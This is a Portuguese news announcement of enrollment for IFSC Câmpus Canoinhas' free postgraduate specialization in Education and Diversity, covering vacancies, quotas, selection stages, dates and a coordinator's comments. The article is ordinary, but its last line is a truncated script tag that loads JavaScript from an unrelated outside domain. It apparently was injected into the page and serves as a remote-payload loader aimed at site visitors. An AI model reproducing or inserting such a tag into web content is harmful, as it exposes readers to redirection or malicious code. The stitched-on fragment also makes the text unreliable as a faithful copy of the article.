Estão abertas até 14 de outubro as inscrições para cursos de pós-graduação do Instituto Federal de Santa Catarina (IFSC). No Câmpus Canoinhas, as inscrições são para a primeira turma da especialização em Educação e Diversidade, que tem o objetivo de qualificar profissionais da educação para atuação diante da diversidade, complexidade e contradições das relações sociais no espaço público da escola, a fim de consolidar as relações democráticas e de convívio com as diferenças.
Com carga horária de 420 horas, o curso tem duração de três semestres, com início em fevereiro do ano que vem. As aulas são presenciais a cada quinze dias, nas sextas-feiras à noite e aos sábados, de manhã e à tarde. São 40 vagas disponíveis com reserva de vagas para pessoas com deficiência e também para cotas raciais.
Por ser destinado a profissionais de educação, preferencialmente com formação nas licenciaturas e que tenham interesse em pesquisar temáticas relacionadas à educação e diversidade, o curso tem como pré-requisito o diploma de graduação reconhecido pelo MEC. O processo seletivo é composto de duas etapas: análise documental e, para os selecionados para a segunda fase, arguição escrita.
O curso é gratuito e sem taxa de inscrição, que deve ser feita pela internet no Portal do IFSC (www.ifsc.edu.br). Quem não tiver acesso à internet pode fazer sua inscrição em qualquer câmpus do IFSC. Em Canoinhas, o endereço é Av. Expedicionários, 2150 – Bairro Campo da Água Verde. O número de telefone para contato é o (47) 3627-4500.
Os aprovados serão divulgados na página de Resultados em 12 de dezembro e a matrícula deverá ser feita de 17 a 19 de dezembro.
Segundo o coordenador da especialização, Vilson Cesar Schenato, a escolha do curso levou em conta a disposição de professores licenciados do IFSC em atuar na formação de formadores e a demanda por este tipo de formação junto às redes de ensino de Canoinhas e região. “O IFSC é a única instituição pública e federal de ensino presencial aqui na região, aumentando o compromisso com as demais instituições no sentido de melhorar o desenvolvimento humano da região, que passa necessariamente pela melhoria da educação, numa perspectiva inclusiva, democrática e que auxilie na promoção da justiça social para o Planalto Norte Catarinense”, ressalta.
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>